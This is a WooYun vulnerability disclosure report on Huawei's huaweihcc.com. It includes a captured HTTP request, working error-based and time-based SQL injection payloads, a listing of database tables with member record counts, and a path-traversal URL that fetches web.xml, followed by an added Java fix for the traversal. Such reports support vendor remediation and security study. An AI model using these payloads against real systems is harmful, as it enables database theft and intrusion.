WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online reader -------- http://drop.zone.ci/
2016-05-06: Details reported to the vendor, awaiting vendor response
2016-05-09: Vendor has confirmed; details disclosed to the vendor only
2016-05-19: Details disclosed to core white hats and relevant domain experts
2016-05-29: Details disclosed to regular white hats
2016-06-08: Details disclosed to intern white hats
2016-06-23: Details disclosed to the public
Where's my latiao?
POST /web/member/memberSurveyAction!answerQuestion.do HTTP/1.1
Content-Length: 2916
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: www.huaweihcc.com
Cookie: JSESSIONID=ADEB3C74B5159E2AC9A0AB6AC0C1050C-n1.jvm1; pvndwvyk=1
Host: www.huaweihcc.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

answerList%5b0%5d.optionId=98&answerList%5b0%5d.optionValue=1&answerList%5b0%5d.otherOptionId=105&answerList%5b0%5d.questionId=13&answerList%5b0%5d.surveyId=2&answerList%5b1%5d.optionId=106&answerList%5b1%5d.optionValue=1&answerList%5b1%5d.otherOptionId=128&answerList%5b1%5d.questionId=14&answerList%5b1%5d.surveyId=2&answerList%5b2%5d.optionId=135&answerList%5b2%5d.questionId=15&answerList%5b2%5d.surveyId=2&answerList%5b3%5d.optionId=129&answerList%5b3%5d.optionValue=*&answerList%5b3%5d.otherOptionId=134&answerList%5b3%5d.questionId=16&answerList%5b3%5d.surveyId=2&answerList%5b4%5d.checkBoxOptionId=146&answerList%5b4%5d.checkBoxOptionId=150&answerList%5b4%5d.checkBoxOptionId=151&answerList%5b4%5d.checkBoxOptionId=143&answerList%5b4%5d.checkBoxOptionId=142&answerList%5b4%5d.checkBoxOptionId=145&answerList%5b4%5d.checkBoxOptionId=144&answerList%5b4%5d.checkBoxOptionId=149&answerList%5b4%5d.checkBoxOptionId=155&answerList%5b4%5d.checkBoxOptionId=154&answerList%5b4%5d.checkBoxOptionId=148&answerList%5b4%5d.checkBoxOptionId=152&answerList%5b4%5d.checkBoxOptionId=153&answerList%5b4%5d.checkBoxOptionId=147&answerList%5b4%5d.checkBoxOptionId=139&answerList%5b4%5d.checkBoxOptionId=140&answerList%5b4%5d.checkBoxOptionId=141&answerList%5b4%5d.optionValue=1&answerList%5b4%5d.otherOptionId=155&answerList%5b4%5d.questionId=17&answerList%5b4%5d.surveyId=2&answerList%5b5%5d.optionId=156&answerList%5b5%5d.questionId=18&answerList%5b5%5d.surveyId=2&answerList%5b6%5d.checkBoxOptionId=165&answerList%5b6%5d.checkBoxOptionId=164&answerList%5b6%5d.checkBoxOptionId=166&answerList%5b6%5d.checkBoxOptionId=171&answerList%5b6%5d.checkBoxOptionId=172&answerList%5b6%5d.checkBoxOptionId=173&answerList%5b6%5d.checkBoxOptionId=170&answerList%5b6%5d.checkBoxOptionId=167&answerList%5b6%5d.checkBoxOptionId=168&answerList%5b6%5d.checkBoxOptionId=169&answerList%5b6%5d.optionValue=1&answerList%5b6%5d.otherOptionId=173&answerList%5b6%5d.questionId=19&answerList%5b6%5d.surveyId=2&answerList%5b7%5d.optionId=174&answerList%5b7%5d.questionId=20&answerList%5b7%5d.surveyId=2&answerList%5b8%5d.checkBoxOptionId=178&answerList%5b8%5d.checkBoxOptionId=179&answerList%5b8%5d.checkBoxOptionId=176&answerList%5b8%5d.checkBoxOptionId=177&answerList%5b8%5d.checkBoxOptionId=181&answerList%5b8%5d.checkBoxOptionId=180&answerList%5b8%5d.optionValue=1&answerList%5b8%5d.otherOptionId=181&answerList%5b8%5d.questionId=21&answerList%5b8%5d.surveyId=2&answerList%5b9%5d.optionId=182&answerList%5b9%5d.questionId=22&answerList%5b9%5d.surveyId=2&siteId=5&struts.token.name=token&surveyMember.company=Baidua&surveyMember.country=AFG&surveyMember.genderCode=female&surveyMember.memberEmail=sample%40email.tst&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: answerList[0].optionId=98&answerList[0].optionValue=1&answerList[0].otherOptionId=105&answerList[0].questionId=13&answerList[0].surveyId=2&answerList[1].optionId=106&answerList[1].optionValue=1&answerList[1].otherOptionId=128&answerList[1].questionId=14&answerList[1].surveyId=2&answerList[2].optionId=135&answerList[2].questionId=15&answerList[2].surveyId=2&answerList[3].optionId=129&answerList[3].optionValue=' AND (SELECT 6810 FROM(SELECT COUNT(*),CONCAT(0x716b767171,(SELECT (ELT(6810=6810,1))),0x716b787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Pesh'='Pesh&answerList[3].otherOptionId=134&answerList[3].questionId=16&answerList[3].surveyId=2&answerList[4].checkBoxOptionId=146&answerList[4].checkBoxOptionId=150&answerList[4].checkBoxOptionId=151&answerList[4].checkBoxOptionId=143&answerList[4].checkBoxOptionId=142&answerList[4].checkBoxOptionId=145&answerList[4].checkBoxOptionId=144&answerList[4].checkBoxOptionId=149&answerList[4].checkBoxOptionId=155&answerList[4].checkBoxOptionId=154&answerList[4].checkBoxOptionId=148&answerList[4].checkBoxOptionId=152&answerList[4].checkBoxOptionId=153&answerList[4].checkBoxOptionId=147&answerList[4].checkBoxOptionId=139&answerList[4].checkBoxOptionId=140&answerList[4].checkBoxOptionId=141&answerList[4].optionValue=1&answerList[4].otherOptionId=155&answerList[4].questionId=17&answerList[4].surveyId=2&answerList[5].optionId=156&answerList[5].questionId=18&answerList[5].surveyId=2&answerList[6].checkBoxOptionId=165&answerList[6].checkBoxOptionId=164&answerList[6].checkBoxOptionId=166&answerList[6].checkBoxOptionId=171&answerList[6].checkBoxOptionId=172&answerList[6].checkBoxOptionId=173&answerList[6].checkBoxOptionId=170&answerList[6].checkBoxOptionId=167&answerList[6].checkBoxOptionId=168&answerList[6].checkBoxOptionId=169&answerList[6].optionValue=1&answerList[6].otherOptionId=173&answerList[6].questionId=19&answerList[6].surveyId=2&answerList[7].optionId=174&answerList[7].questionId=20&answerList[7].surveyId=2&answerList[8].checkBoxOptionId=178&answerList[8].checkBoxOptionId=179&answerList[8].checkBoxOptionId=176&answerList[8].checkBoxOptionId=177&answerList[8].checkBoxOptionId=181&answerList[8].checkBoxOptionId=180&answerList[8].optionValue=1&answerList[8].otherOptionId=181&answerList[8].questionId=21&answerList[8].surveyId=2&answerList[9].optionId=182&answerList[9].questionId=22&answerList[9].surveyId=2&siteId=5&struts.token.name=token&surveyMember.company=Baidua&surveyMember.country=AFG&surveyMember.genderCode=female&surveyMember.memberEmail=sample@email.tst&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: answerList[0].optionId=98&answerList[0].optionValue=1&answerList[0].otherOptionId=105&answerList[0].questionId=13&answerList[0].surveyId=2&answerList[1].optionId=106&answerList[1].optionValue=1&answerList[1].otherOptionId=128&answerList[1].questionId=14&answerList[1].surveyId=2&answerList[2].optionId=135&answerList[2].questionId=15&answerList[2].surveyId=2&answerList[3].optionId=129&answerList[3].optionValue=' AND (SELECT * FROM (SELECT(SLEEP(5)))xisD) AND 'EqKa'='EqKa&answerList[3].otherOptionId=134&answerList[3].questionId=16&answerList[3].surveyId=2&answerList[4].checkBoxOptionId=146&answerList[4].checkBoxOptionId=150&answerList[4].checkBoxOptionId=151&answerList[4].checkBoxOptionId=143&answerList[4].checkBoxOptionId=142&answerList[4].checkBoxOptionId=145&answerList[4].checkBoxOptionId=144&answerList[4].checkBoxOptionId=149&answerList[4].checkBoxOptionId=155&answerList[4].checkBoxOptionId=154&answerList[4].checkBoxOptionId=148&answerList[4].checkBoxOptionId=152&answerList[4].checkBoxOptionId=153&answerList[4].checkBoxOptionId=147&answerList[4].checkBoxOptionId=139&answerList[4].checkBoxOptionId=140&answerList[4].checkBoxOptionId=141&answerList[4].optionValue=1&answerList[4].otherOptionId=155&answerList[4].questionId=17&answerList[4].surveyId=2&answerList[5].optionId=156&answerList[5].questionId=18&answerList[5].surveyId=2&answerList[6].checkBoxOptionId=165&answerList[6].checkBoxOptionId=164&answerList[6].checkBoxOptionId=166&answerList[6].checkBoxOptionId=171&answerList[6].checkBoxOptionId=172&answerList[6].checkBoxOptionId=173&answerList[6].checkBoxOptionId=170&answerList[6].checkBoxOptionId=167&answerList[6].checkBoxOptionId=168&answerList[6].checkBoxOptionId=169&answerList[6].optionValue=1&answerList[6].otherOptionId=173&answerList[6].questionId=19&answerList[6].surveyId=2&answerList[7].optionId=174&answerList[7].questionId=20&answerList[7].surveyId=2&answerList[8].checkBoxOptionId=178&answerList[8].checkBoxOptionId=179&answerList[8].checkBoxOptionId=176&answerList[8].checkBoxOptionId=177&answerList[8].checkBoxOptionId=181&answerList[8].checkBoxOptionId=180&answerList[8].optionValue=1&answerList[8].otherOptionId=181&answerList[8].questionId=21&answerList[8].surveyId=2&answerList[9].optionId=182&answerList[9].questionId=22&answerList[9].surveyId=2&siteId=5&struts.token.name=token&surveyMember.company=Baidua&surveyMember.country=AFG&surveyMember.genderCode=female&surveyMember.memberEmail=sample@email.tst&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F
---
back-end DBMS: MySQL >= 5.0.0
Database: hcc
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| tb_em_answer                | 2001934 |
| hcc_member                  |  173091 |
| tb_em_survey_member         |  116952 |
| hcc_member_copy             |   51600 |
| hcc_member_bak_hcc2014      |   25989 |
| hcc_mdb_response            |   11508 |
| hcc_email_send_record       |   10383 |
| hcc_ticket                  |    9961 |
| hcc_email_send_record_copy  |    9024 |
| tb_app_business_log         |    4150 |
| hcc_bookagenda              |    2971 |
| hcc_test                    |    2130 |
| hcc_member_copy0503         |    1567 |
| hcc_invite                  |    1322 |
| tr_em_member_site           |    1248 |
| hcc_member_copy0426         |    1182 |
| tr_em_member_site_copy0426  |     998 |
| tr_em_member_site_copy0425  |     946 |
| hcc_webinar                 |     535 |
| hcc_order                   |     472 |
| hcc_agenda                  |     413 |
| hcc_agenda_20140916bak      |     413 |
| hcc_speaker                 |     247 |
| hcc_country                 |     241 |
| hcc_survey_result           |     220 |
| tb_em_option                |     185 |
| tb_app_element              |     126 |
| hcc_datum                   |     114 |
| hcc_picture                 |      91 |
| tr_app_role_menu_bakhcc2014 |      89 |
| hcc_resource_item           |      86 |
| hcc_sponsor                 |      66 |
| tb_app_menu_bakhcc2014      |      50 |
| tb_app_element_group        |      37 |
| hcc_cims_group              |      29 |
| hcc_media                   |      29 |
| hcc_article                 |      26 |
| hcc_datum_catetory          |      25 |
| hcc_email_template          |      24 |
| tb_em_question              |      22 |
| tr_app_role_menu            |      21 |
| hcc_conferenceroom          |      17 |
| tr_app_user_role            |      17 |
| tb_app_menu                 |      16 |
| tb_app_user                 |      15 |
| hcc_lab_content             |      11 |
| hcc_question_type           |      10 |
| hcc_resource                |      10 |
| hcc_survey_item             |      10 |
| hcc_survey_question         |      10 |
| tr_em_site_params           |       9 |
| tb_app_params               |       8 |
| tb_app_role                 |       8 |
| tb_em_site                  |       8 |
| tr_em_user_site             |       7 |
| hcc_global_survey           |       5 |
| tb_em_params                |       5 |
| hcc_lab_handbook            |       4 |
| hcc_member_topic            |       4 |
| hcc_lab_librarytype         |       2 |
| hcc_seq                     |       2 |
| tb_em_survey                |       2 |
| hcc_media_meterial          |       1 |
| hcc_survey                  |       1 |
| tb_app_organization         |       1 |
| tb_em_prizes                |       1 |
+-----------------------------+---------+
Arbitrary file download:
www.huaweihcc.com/fileDownloadServlet?%20Enterprise%20Cloud%20Service_SAP_Open%20Version.pdf&fileName=../conf/web.xml&isFtp=1&sameName=1&selfilePath=europe/en/
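The traversal above works because the servlet lets fileName and selfilePath walk outside the download directory. The resolver below is an added illustration of the containment check that closes that class of bug; it is not Huawei's code, and the root directory, the parameter names and the way the two parameters are joined are assumptions modelled on the request in this report.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

/**
 * Hypothetical download resolver: serves files only from a fixed root.
 * selfilePath selects a sub-directory, fileName a single file inside it.
 */
public final class SafeDownloadResolver {
    private final Path root;

    public SafeDownloadResolver(String rootDir) {
        // Normalise once; every candidate path is checked against this prefix.
        this.root = Paths.get(rootDir).toAbsolutePath().normalize();
    }

    /** Returns the file to serve, or null when the request must be refused. */
    public Path resolve(String selfilePath, String fileName) {
        if (selfilePath == null || fileName == null || fileName.isEmpty()) return null;
        // A file name is one path component: no separators, no NUL bytes.
        if (fileName.indexOf('\0') >= 0 || fileName.indexOf('/') >= 0
                || fileName.indexOf('\\') >= 0 || fileName.equals("..")) {
            return null;
        }
        // The directory part may have several components, but none may be "..".
        for (String part : selfilePath.replace('\\', '/').split("/")) {
            if (part.equals("..") || part.indexOf('\0') >= 0) return null;
        }
        Path candidate = root.resolve(selfilePath).resolve(fileName).normalize();
        // Defence in depth: after normalisation the path must still sit under root
        // (an absolute selfilePath would replace root and fail this test).
        return candidate.startsWith(root) ? candidate : null;
    }

    public static void main(String[] args) {
        // Constructed root directory; the request shapes come from the report.
        SafeDownloadResolver r = new SafeDownloadResolver("/srv/hcc/downloads");
        // Legitimate shape: a PDF under europe/en/ is resolved inside root.
        System.out.println(r.resolve("europe/en/", "Enterprise Cloud Service_SAP_Open Version.pdf"));
        // The traversal from the report is refused (prints null).
        System.out.println(r.resolve("europe/en/", "../conf/web.xml"));
        // Traversal hidden in the directory parameter is refused as well.
        System.out.println(r.resolve("../../conf", "web.xml"));
    }
}
```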
Severity: High
Vulnerability Rank: 10
Confirmed: 2016-05-09 09:37
Thank you to the white hat for your attention to Huawei's security; we have forwarded this vulnerability to the business unit for remediation.
None yet